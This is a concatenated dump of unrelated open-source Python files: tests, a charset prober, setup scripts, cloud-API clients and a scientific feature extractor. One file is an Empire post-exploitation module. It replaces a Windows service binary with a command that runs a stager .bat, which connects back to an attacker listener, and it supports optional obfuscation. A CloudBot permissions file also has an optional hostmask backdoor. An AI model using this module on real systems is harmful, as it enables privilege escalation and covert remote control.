path = 'service/edp/resources/edp-main-wrapper.jar'
name = 'builtin-%s.jar' % six.text_type(uuid.uuid4())
return [{'raw': files.get_file_binary(path),
'name': name}]
return []
|
knabar/openmicroscopy
|
refs/heads/develop
|
components/tools/OmeroPy/test/unit/clitest/test_download.py
|
15
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import pytest
from omero.plugins.download import DownloadControl
from omero.cli import CLI, NonZeroReturnCode
class TestDownload(object):
def setup_method(self, method):
self.cli = CLI()
self.cli.register("download", DownloadControl, "TEST")
self.args = ["download"]
def testHelp(self):
self.args += ["-h"]
self.cli.invoke(self.args, strict=True)
@pytest.mark.parametrize(
'bad_input',
['-1', 'OriginalFile:-1', 'FileAnnotation:-1', 'Image:-1'])
def testInvalidInput(self, bad_input):
self.args += [bad_input, '-']
with pytest.raises(NonZeroReturnCode):
self.cli.invoke(self.args, strict=True)
|
ray-zhong/github_trend_spider
|
refs/heads/master
|
ENV/Lib/site-packages/pip/_vendor/requests/packages/chardet/sjisprober.py
|
1776
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(SJISSMModel)
self._mDistributionAnalyzer = SJISDistributionAnalysis()
self._mContextAnalyzer = SJISContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
|
thurday/sslyze
|
refs/heads/master
|
setup.py
|
5
|
#!/usr/bin/env python
from sys import platform
from sslyze import PROJECT_VERSION, PROJECT_URL, PROJECT_EMAIL, PROJECT_DESC
from distutils.core import setup
NASSL_BINARY = '_nassl.so'
if platform == 'win32':
NASSL_BINARY = '_nassl.pyd'
SSLYZE_SETUP = {
'name' : 'SSLyze',
'version' : PROJECT_VERSION,
'description' : PROJECT_DESC,
'long_description' : open('README.md').read() + '\n' + open('AUTHORS.txt').read(),
'author_email' : PROJECT_EMAIL,
'url' : PROJECT_URL,
'scripts' : ['sslyze.py'],
'packages' : ['plugins', 'utils', 'nassl'],
'package_data' : {'plugins' : ['data/trust_stores/*.pem'],
'nassl' : [NASSL_BINARY]},
'license' : open('LICENSE.txt').read()
}
setup(**SSLYZE_SETUP)
|
alisaifee/AutobahnPython
|
refs/heads/master
|
examples/twisted/websocket/echo_variants/client_with_params.py
|
18
|
###############################################################################
##
## Copyright (C) 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
class EchoClientProtocol(WebSocketClientProtocol):
def __init__(self, message):
self.message = message.encode('utf8')
def sendHello(self):
self.sendMessage(self.message)
def onOpen(self):
self.sendHello()
def onMessage(self, payload, isBinary):
if not isBinary:
print("Text message received: {}".format(payload.decode('utf8')))
reactor.callLater(1, self.sendHello)
class EchoClientFactory(WebSocketClientFactory):
def buildProtocol(self, addr):
proto = EchoClientProtocol(self.message)
proto.factory = self
return proto
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Need the WebSocket server address, i.e. ws://localhost:9000"
sys.exit(1)
factory = EchoClientFactory(sys.argv[1])
factory.message = sys.argv[2] if len(sys.argv) > 2 else "My configurable message"
connectWS(factory)
reactor.run()
|
thebestgirl123/CloudBot
|
refs/heads/gonzobot
|
cloudbot/permissions.py
|
32
|
from fnmatch import fnmatch
import logging
logger = logging.getLogger("cloudbot")
# put your hostmask here for magic
# it's disabled by default, see has_perm_mask()
backdoor = None
class PermissionManager(object):
"""
:type name: str
:type config: dict[str, ?]
:type group_perms: dict[str, list[str]]
:type group_users: dict[str, list[str]]
:type perm_users: dict[str, list[str]]
"""
def __init__(self, conn):
"""
:type conn: cloudbot.client.Client
"""
logger.info("[{}|permissions] Created permission manager for {}.".format(conn.name, conn.name))
# stuff
self.name = conn.name
self.config = conn.config
self.group_perms = {}
self.group_users = {}
self.perm_users = {}
self.reload()
def reload(self):
self.group_perms = {}
self.group_users = {}
self.perm_users = {}
logger.info("[{}|permissions] Reloading permissions for {}.".format(self.name, self.name))
groups = self.config.get("permissions", {})
# work out the permissions and users each group has
for key, value in groups.items():
if not key.islower():
logger.warning("[{}|permissions] Warning! Non-lower-case group '{}' in config. This will cause problems"
" when setting permissions using the bot's permissions commands"
.format(self.name, key))
key = key.lower()
self.group_perms[key] = []
self.group_users[key] = []
for permission in value["perms"]:
self.group_perms[key].append(permission.lower())
for user in value["users"]:
self.group_users[key].append(user.lower())
for group, users in self.group_users.items():
group_perms = self.group_perms[group]
for perm in group_perms:
if self.perm_users.get(perm) is None:
self.perm_users[perm] = []
self.perm_users[perm].extend(users)
logger.debug("[{}|permissions] Group permissions: {}".format(self.name, self.group_perms))
logger.debug("[{}|permissions] Group users: {}".format(self.name, self.group_users))
logger.debug("[{}|permissions] Permission users: {}".format(self.name, self.perm_users))
def has_perm_mask(self, user_mask, perm, notice=True):
"""
:type user_mask: str
:type perm: str
:rtype: bool
"""
if backdoor:
if fnmatch(user_mask.lower(), backdoor.lower()):
return True
if not perm.lower() in self.perm_users:
# no one has access
return False
allowed_users = self.perm_users[perm.lower()]
for allowed_mask in allowed_users:
if fnmatch(user_mask.lower(), allowed_mask):
if notice:
logger.info("[{}|permissions] Allowed user {} access to {}".format(self.name, user_mask, perm))
return True
return False
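        # Masks are shell-style patterns matched with fnmatch, so an allowed
        # mask such as "*!*@staff.example.com" (hypothetical) would grant any
        # user connecting from that host.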
def get_groups(self):
return set().union(self.group_perms.keys(), self.group_users.keys())
def get_group_permissions(self, group):
"""
:type group: str
:rtype: list[str]
"""
return self.group_perms.get(group.lower())
def get_group_users(self, group):
"""
:type group: str
:rtype: list[str]
"""
return self.group_users.get(group.lower())
def get_user_permissions(self, user_mask):
"""
:type user_mask: str
:rtype: list[str]
"""
permissions = set()
for permission, users in self.perm_users.items():
for mask_to_check in users:
if fnmatch(user_mask.lower(), mask_to_check):
permissions.add(permission)
return permissions
def get_user_groups(self, user_mask):
"""
:type user_mask: str
:rtype: list[str]
"""
groups = []
for group, users in self.group_users.items():
for mask_to_check in users:
                if fnmatch(user_mask.lower(), mask_to_check):
                    groups.append(group)
                    break  # one matching mask per group is enough; avoids duplicates
return groups
def group_exists(self, group):
"""
Checks whether a group exists
:type group: str
:rtype: bool
"""
return group.lower() in self.group_perms
def user_in_group(self, user_mask, group):
"""
Checks whether a user is matched by any masks in a given group
:type group: str
:type user_mask: str
:rtype: bool
"""
users = self.group_users.get(group.lower())
if not users:
return False
for mask_to_check in users:
if fnmatch(user_mask.lower(), mask_to_check):
return True
return False
def remove_group_user(self, group, user_mask):
"""
Removes all users that match user_mask from group. Returns a list of user masks removed from the group.
        Use permission_manager.reload() to make this change take effect.
Use bot.config.save_config() to save this change to file.
:type group: str
:type user_mask: str
:rtype: list[str]
"""
masks_removed = []
config_groups = self.config.get("permissions", {})
for mask_to_check in list(self.group_users[group.lower()]):
if fnmatch(user_mask.lower(), mask_to_check):
masks_removed.append(mask_to_check)
# We're going to act like the group keys are all lowercase.
# The user has been warned (above) if they aren't.
# Okay, maybe a warning, but no support.
if group not in config_groups:
logger.warning(
"[{}|permissions] Can't remove user from group due to"
" upper-case group names!".format(self.name))
continue
config_group = config_groups.get(group)
config_users = config_group.get("users")
config_users.remove(mask_to_check)
return masks_removed
def add_user_to_group(self, user_mask, group):
"""
Adds user to group. Returns whether this actually did anything.
        Use permission_manager.reload() to make this change take effect.
Use bot.config.save_config() to save this change to file.
:type group: str
:type user_mask: str
:rtype: bool
"""
if self.user_in_group(user_mask, group):
return False
# We're going to act like the group keys are all lowercase.
# The user has been warned (above) if they aren't.
groups = self.config.get("permissions", {})
if group in groups:
group_dict = groups.get(group)
users = group_dict["users"]
users.append(user_mask)
else:
# create the group
group_dict = {"users": [user_mask], "perms": []}
groups[group] = group_dict
return True
|
js0701/chromium-crosswalk
|
refs/heads/master
|
tools/ipc_fuzzer/scripts/utils.py
|
38
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions used by Generational and Mutational ClusterFuzz
fuzzers."""
import argparse
import os
import random
import string
import sys
import tempfile
APP_PATH_KEY = 'APP_PATH'
FLAGS_PREFIX = 'flags-'
FUZZ_PREFIX = 'fuzz-'
IPC_FUZZER_APPLICATION = 'ipc_fuzzer'
IPC_REPLAY_APPLICATION = 'ipc_fuzzer_replay'
IPCDUMP_EXTENSION = '.ipcdump'
LAUNCH_PREFIXES = [
'--gpu-launcher',
'--plugin-launcher',
'--ppapi-plugin-launcher',
'--renderer-cmd-prefix',
'--utility-cmd-prefix',
]
def application_name_for_platform(application_name):
"""Return application name for current platform."""
if platform() == 'WINDOWS':
return application_name + '.exe'
return application_name
def create_flags_file(ipcdump_testcase_path, ipc_replay_application_path):
"""Create a flags file to add launch prefix to application command line."""
random_launch_prefix = random.choice(LAUNCH_PREFIXES)
file_content = '%s=%s' % (random_launch_prefix, ipc_replay_application_path)
flags_file_path = ipcdump_testcase_path.replace(FUZZ_PREFIX, FLAGS_PREFIX)
file_handle = open(flags_file_path, 'w')
file_handle.write(file_content)
file_handle.close()
def create_temp_file():
"""Create a temporary file."""
temp_file = tempfile.NamedTemporaryFile(delete=False)
temp_file.close()
return temp_file.name
def get_fuzzer_application_name():
"""Get the application name for the fuzzer binary."""
return application_name_for_platform(IPC_FUZZER_APPLICATION)
def get_replay_application_name():
"""Get the application name for the replay binary."""
return application_name_for_platform(IPC_REPLAY_APPLICATION)
def parse_arguments():
"""Parse fuzzer arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir')
parser.add_argument('--output_dir')
parser.add_argument('--no_of_files', type=int)
  args = parser.parse_args()
if (not args.input_dir or
not args.output_dir or
not args.no_of_files):
parser.print_help()
sys.exit(1)
return args
def random_id(size=16, chars=string.ascii_lowercase):
"""Return a random id string, default 16 characters long."""
return ''.join(random.choice(chars) for _ in range(size))
def random_ipcdump_testcase_path(ipcdump_directory):
"""Return a random ipc testcase path."""
return os.path.join(
ipcdump_directory,
'%s%s%s' % (FUZZ_PREFIX, random_id(), IPCDUMP_EXTENSION))
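# Example output (the 16-char random id varies): "out/fuzz-qwertyuiopasdfgh.ipcdump"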
def platform():
"""Return running platform."""
if sys.platform.startswith('win'):
return 'WINDOWS'
if sys.platform.startswith('linux'):
return 'LINUX'
if sys.platform == 'darwin':
return 'MAC'
assert False, 'Unknown platform'
def get_application_path():
"""Return chrome application path."""
if APP_PATH_KEY not in os.environ:
sys.exit(
'Environment variable %s should be set to chrome path.' % APP_PATH_KEY)
return os.environ[APP_PATH_KEY]
|
echodaemon/Empire
|
refs/heads/master
|
lib/modules/powershell/privesc/powerup/service_exe_stager.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Install-ServiceBinary',
'Author': ['@harmj0y'],
'Description': ("Backs up a service's binary and replaces the original "
"with a binary that launches a stager.bat."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : "The service name to manipulate.",
'Required' : True,
'Value' : ''
},
'Delete' : {
'Description' : "Switch. Have the launcher.bat delete itself after running.",
'Required' : False,
'Value' : 'True'
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
        except IOError:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
serviceName = self.options['ServiceName']['Value']
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")
script = moduleCode
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers['windows/launcher_bat']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
if self.options['Delete']['Value'].lower() == "true":
l.options['Delete']['Value'] = "True"
else:
l.options['Delete']['Value'] = "False"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
scriptEnd = ";$tempLoc = \"$env:temp\\debug.bat\""
scriptEnd += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
scriptEnd += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
scriptEnd += "\"Launcher bat written to $tempLoc `n\";\n"
if launcherCode == "":
print helpers.color("[!] Error in launcher .bat generation.")
return ""
else:
scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\""
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
woshilapin/cjdns
|
refs/heads/master
|
node_build/dependencies/libuv/build/gyp/test/defines/gyptest-defines-env.py
|
501
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies build of an executable with C++ define specified by a gyp define.
"""
import os
import TestGyp
test = TestGyp.TestGyp()
# With the value only given in environment, it should be used.
try:
os.environ['GYP_DEFINES'] = 'value=10'
test.run_gyp('defines-env.gyp')
finally:
del os.environ['GYP_DEFINES']
test.build('defines-env.gyp')
expect = """\
VALUE is 10
"""
test.run_built_executable('defines', stdout=expect)
# With the value given in both command line and environment,
# command line should take precedence.
try:
os.environ['GYP_DEFINES'] = 'value=20'
test.run_gyp('defines-env.gyp', '-Dvalue=25')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 25
"""
test.run_built_executable('defines', stdout=expect)
# With the value only given in environment, it should be ignored if
# --ignore-environment is specified.
try:
os.environ['GYP_DEFINES'] = 'value=30'
test.run_gyp('defines-env.gyp', '--ignore-environment')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 5
"""
test.run_built_executable('defines', stdout=expect)
# With the value given in both command line and environment, and
# --ignore-environment also specified, command line should still be used.
try:
os.environ['GYP_DEFINES'] = 'value=40'
test.run_gyp('defines-env.gyp', '--ignore-environment', '-Dvalue=45')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 45
"""
test.run_built_executable('defines', stdout=expect)
test.pass_test()
|
glemaitre/protoclass
|
refs/heads/master
|
protoclass/extraction/mrsi_spectra_extraction.py
|
1
|
"""MRSI spectra extraction from MRSI modality."""
from __future__ import division
import numpy as np
from scipy.linalg import norm as lnorm
from .mrsi_extraction import MRSIExtraction
KNOWN_NORMALIZATION = ('l2', 'l1')
class MRSISpectraExtraction(MRSIExtraction):
"""MRSI spectra extraction from MRSI modality.
Parameters
----------
base_modality : object
The base modality on which the normalization will be applied. The base
        modality should inherit from the StandaloneModality class.
ppm_range : tuple of float, optional (default=(2., 4.))
Define the range of ppm to extract from the spectrum.
normalization : None or str, optional (default='l2')
Apply a normalization or not. Choice are None, 'l2', or 'l1'.
Attributes
----------
base_modality_ : object
The base modality on which the normalization will be applied. The base
        modality should inherit from the StandaloneModality class.
roi_data_ : ndarray, shape flexible
Corresponds to the index to consider in order to fit the data.
"""
def __init__(self, base_modality, ppm_range=(2., 4.), normalization='l2'):
super(MRSISpectraExtraction, self).__init__(base_modality)
self.ppm_range = ppm_range
self.normalization = normalization
self.is_fitted = False
self.data_ = None
def fit(self, modality, ground_truth=None, cat=None):
"""Find the parameters needed to apply the extraction.
Parameters
----------
modality : object of type TemporalModality
The modality object of interest.
        ground_truth : object of type GTModality or None
The ground-truth of GTModality. If None, the whole data will be
considered.
cat : str or None
            String corresponding to the ground-truth of interest. Cannot be
None if ground-truth is not None.
        Returns
        -------
self : object
Return self.
"""
super(MRSISpectraExtraction, self).fit(
modality=modality,
ground_truth=ground_truth,
cat=cat)
# Check if we need to know the normalization factor
if self.normalization is not None:
if self.normalization not in KNOWN_NORMALIZATION:
raise ValueError('Unknown normalization.')
self.fit_params_ = np.zeros((modality.data_.shape[1],
modality.data_.shape[2],
modality.data_.shape[3]))
for y in range(modality.data_.shape[1]):
for x in range(modality.data_.shape[2]):
for z in range(modality.data_.shape[3]):
if self.normalization == 'l1':
self.fit_params_[y, x, z] = lnorm(np.real(
modality.data_[:, y, x, z]), 1)
if self.normalization == 'l2':
self.fit_params_[y, x, z] = lnorm(np.real(
modality.data_[:, y, x, z]), 2)
self.is_fitted = True
return self
def transform(self, modality, ground_truth=None, cat=None):
"""Extract the data from the given modality.
Parameters
----------
modality : object of type StandaloneModality
The modality object of interest.
        ground_truth : object of type GTModality or None
The ground-truth of GTModality. If None, the whole data will be
considered.
cat : str or None
String corresponding to the ground-truth of interest. Cannot be
None if ground-truth is not None.
Returns
-------
data : ndarray, shape (n_sample, n_feature)
A matrix containing the features extracted. The number of samples
is equal to the number of positive labels in the ground-truth.
"""
super(MRSISpectraExtraction, self).transform(
modality=modality,
ground_truth=ground_truth,
cat=cat)
# Check that the data have been fitted
if not self.is_fitted:
raise ValueError('Fit the data first.')
# We first need to crop the data properly depending on the ppm range
idx_ppm_crop = []
for y in range(modality.bandwidth_ppm.shape[1]):
for x in range(modality.bandwidth_ppm.shape[2]):
for z in range(modality.bandwidth_ppm.shape[3]):
# Get the range for the current data
# Compute the delta
delta_ppm = np.abs((modality.bandwidth_ppm[1, y, x, z] -
modality.bandwidth_ppm[0, y, x, z]))
# Compute the number of element to take
nb_element = int(np.ceil((self.ppm_range[1] -
self.ppm_range[0]) / delta_ppm))
# Find the first index
first_idx = np.flatnonzero(
modality.bandwidth_ppm[:, y, x, z] >
self.ppm_range[0])[-1]
idx_mask = np.arange(first_idx, first_idx - nb_element, -1)
idx_ppm_crop.append(idx_mask)
# Convert the list into an array
idx_ppm_crop = np.array(idx_ppm_crop)
# Reshape the array according to the data
idx_ppm_crop = np.reshape(idx_ppm_crop.T,
(idx_ppm_crop.shape[1],
modality.bandwidth_ppm.shape[1],
modality.bandwidth_ppm.shape[2],
modality.bandwidth_ppm.shape[3]))
# Extract the appropriate part of each signal
data_crop = np.zeros(idx_ppm_crop.shape)
for y in range(modality.data_.shape[1]):
for x in range(modality.data_.shape[2]):
for z in range(modality.data_.shape[3]):
data_crop[:, y, x, z] = np.real(modality.data_[
idx_ppm_crop[:, y, x, z], y, x, z])
# Apply the normalization if necessary
if self.normalization is not None:
data_crop[:, y, x, z] /= self.fit_params_[y, x, z]
data_res = np.zeros((data_crop.shape[0],
ground_truth.data_.shape[1],
ground_truth.data_.shape[2],
ground_truth.data_.shape[3]))
# Resample each ppm bin of the spectrum
for ii in range(data_crop.shape[0]):
# Resample each ppm slice
data_res[ii, :, :, :] = self._resampling_as_gt(
data_crop[ii, :, :, :],
modality,
ground_truth)
# Convert the roi to a numpy array
roi_data = np.array(self.roi_data_)
# Check the number of samples which will be extracted
n_sample = roi_data.shape[1]
# Check the number of dimension
n_dimension = data_res.shape[0]
# Allocate the array
data = np.empty((n_sample, n_dimension))
# Copy the data at the right place
for idx_sample in range(n_sample):
# Get the coordinate of the point to consider
coord = roi_data[:, idx_sample]
# Extract the data
data[idx_sample, :] = data_res[:,
coord[0],
coord[1],
coord[2]]
return data
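# A minimal usage sketch (illustrative; `mrsi_mod` and `gt_mod` are assumed
# to be loaded MRSI-modality and GTModality objects with a 'prostate' label --
# these names are hypothetical, not part of this module):
#
#     ext = MRSISpectraExtraction(mrsi_mod, ppm_range=(2., 4.),
#                                 normalization='l2')
#     ext.fit(mrsi_mod, ground_truth=gt_mod, cat='prostate')
#     features = ext.transform(mrsi_mod, ground_truth=gt_mod, cat='prostate')
#     # -> features has shape (n_samples, n_ppm_bins)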
|
armando-migliaccio/tempest
|
refs/heads/master
|
tempest/services/compute/xml/security_groups_client.py
|
6
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import urllib
from tempest.common.rest_client import RestClientXML
from tempest import exceptions
from tempest.services.compute.xml.common import Document
from tempest.services.compute.xml.common import Element
from tempest.services.compute.xml.common import Text
from tempest.services.compute.xml.common import xml_to_json
from tempest.services.compute.xml.common import XMLNS_11
class SecurityGroupsClientXML(RestClientXML):
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(SecurityGroupsClientXML, self).__init__(
config, username, password,
auth_url, tenant_name)
self.service = self.config.compute.catalog_type
def _parse_array(self, node):
array = []
for child in node.getchildren():
array.append(xml_to_json(child))
return array
def _parse_body(self, body):
json = xml_to_json(body)
return json
def list_security_groups(self, params=None):
"""List all security groups for a user."""
url = 'os-security-groups'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url, self.headers)
body = self._parse_array(etree.fromstring(body))
return resp, body
def get_security_group(self, security_group_id):
"""Get the details of a Security Group."""
url = "os-security-groups/%s" % str(security_group_id)
resp, body = self.get(url, self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def create_security_group(self, name, description):
"""
Creates a new security group.
name (Required): Name of security group.
description (Required): Description of security group.
"""
security_group = Element("security_group", name=name)
des = Element("description")
des.append(Text(content=description))
security_group.append(des)
resp, body = self.post('os-security-groups',
str(Document(security_group)),
self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def delete_security_group(self, security_group_id):
"""Deletes the provided Security Group."""
return self.delete('os-security-groups/%s' %
str(security_group_id), self.headers)
def create_security_group_rule(self, parent_group_id, ip_proto, from_port,
to_port, **kwargs):
"""
Create a new security group rule.
parent_group_id : ID of the security group.
ip_proto : IP protocol (icmp, tcp, udp).
from_port : port at the start of the range.
to_port : port at the end of the range.
The following optional keyword arguments are accepted:
cidr : CIDR for the address range.
group_id : ID of the source group.
"""
group_rule = Element("security_group_rule")
elements = dict()
elements['cidr'] = kwargs.get('cidr')
elements['group_id'] = kwargs.get('group_id')
elements['parent_group_id'] = parent_group_id
elements['ip_protocol'] = ip_proto
elements['from_port'] = from_port
elements['to_port'] = to_port
for k, v in elements.items():
if v is not None:
element = Element(k)
element.append(Text(content=str(v)))
group_rule.append(element)
url = 'os-security-group-rules'
resp, body = self.post(url, str(Document(group_rule)), self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def delete_security_group_rule(self, group_rule_id):
"""Deletes the provided Security Group rule."""
return self.delete('os-security-group-rules/%s' %
str(group_rule_id), self.headers)
def list_security_group_rules(self, security_group_id):
"""List all rules for a security group."""
url = "os-security-groups"
resp, body = self.get(url, self.headers)
body = etree.fromstring(body)
secgroups = body.getchildren()
for secgroup in secgroups:
if secgroup.get('id') == security_group_id:
node = secgroup.find('{%s}rules' % XMLNS_11)
rules = [xml_to_json(x) for x in node.getchildren()]
return resp, rules
raise exceptions.NotFound('No such Security Group')
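# Hedged usage sketch (the surrounding Tempest config/auth objects are assumed
# and not shown; the names and values below are illustrative only):
#
#     client = SecurityGroupsClientXML(config, 'user', 'pass', auth_url)
#     resp, sg = client.create_security_group('web', 'allow http')
#     resp, rule = client.create_security_group_rule(sg['id'], 'tcp', 80, 80,
#                                                    cidr='0.0.0.0/0')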
|
beckastar/django
|
refs/heads/master
|
django/contrib/gis/db/models/sql/where.py
|
70
|
from django.db.models.constants import LOOKUP_SEP
from django.db.models.fields import FieldDoesNotExist
from django.db.models.sql.expressions import SQLEvaluator
from django.db.models.sql.where import Constraint, WhereNode
from django.contrib.gis.db.models.fields import GeometryField
class GeoConstraint(Constraint):
"""
This subclass overrides `process` to better handle geographic SQL
construction.
"""
def __init__(self, init_constraint):
self.alias = init_constraint.alias
self.col = init_constraint.col
self.field = init_constraint.field
def process(self, lookup_type, value, connection):
if isinstance(value, SQLEvaluator):
# Make sure the F Expression destination field exists, and
# set an `srid` attribute with the same value as that of the
# destination.
geo_fld = GeoWhereNode._check_geo_field(value.opts, value.expression.name)
if not geo_fld:
raise ValueError('No geographic field found in expression.')
value.srid = geo_fld.srid
db_type = self.field.db_type(connection=connection)
params = self.field.get_db_prep_lookup(lookup_type, value, connection=connection)
return (self.alias, self.col, db_type), params
class GeoWhereNode(WhereNode):
"""
Used to represent the SQL where-clause for spatial databases --
it is tied to the GeoQuery class that created it.
"""
def _prepare_data(self, data):
if isinstance(data, (list, tuple)):
obj, lookup_type, value = data
if (isinstance(obj, Constraint) and
isinstance(obj.field, GeometryField)):
data = (GeoConstraint(obj), lookup_type, value)
return super(GeoWhereNode, self)._prepare_data(data)
def make_atom(self, child, qn, connection):
lvalue, lookup_type, value_annot, params_or_value = child
if isinstance(lvalue, GeoConstraint):
data, params = lvalue.process(lookup_type, params_or_value, connection)
spatial_sql, spatial_params = connection.ops.spatial_lookup_sql(
